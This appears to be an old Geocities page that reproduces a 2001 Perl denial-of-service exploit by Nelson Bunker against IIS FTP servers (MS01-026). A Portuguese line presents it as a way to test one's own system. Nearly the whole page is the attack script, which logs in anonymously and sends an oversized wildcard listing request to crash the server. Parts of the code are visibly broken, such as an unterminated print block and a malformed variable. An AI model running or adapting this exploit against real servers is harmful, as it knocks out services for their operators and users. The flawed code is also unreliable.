Documento sem título

Este exploit code pode ser usado para testar seu sistema contra um ataque mencionado.

#!/usr/bin/perl
# Author: Nelson Bunker - Critical Watch
# http://www.criticalwatch.com
#
# Simple Wildcard Denial of Service for IIS Ftp Servers - MS01-026
# Tested against several servers. Your mileage may vary.
#
# Assumes anonymous access.
#
# Thanks goes out to Lukasz Luzar [[email protected]]
# For discovering and sharing this information
#
# May 15, 2001
####################_MAIN::Begin_#####################

use Net::FTP;

$wildcard='***************************************** ****************************************************************';

if (not $ARGV[0]) {

print qq~

Usage: wildcard_dos.pl <host>

exit;}

$IPaddress= $ARGV[0];

$SIG {'PIPE'} = FoundIt;

# create new FTP connection w/30 second timeout
$ftp = Net::FTP->new($IPaddress, Timeout => 5);

if(!$ftp){ die"$IPaddress is not responding to ftp connect attempt";}

if(!$ftp->login("anonymous","tester\@")){ die"FTP user anonymous on $IPaddress is unacceptable";}

$bogus = $ftp->ls($wildcard);

sub FoundIt
{
print "This machine $$IPaddress$ is affected\n";
exit(0);

}

Hosted by www.Geocities.ws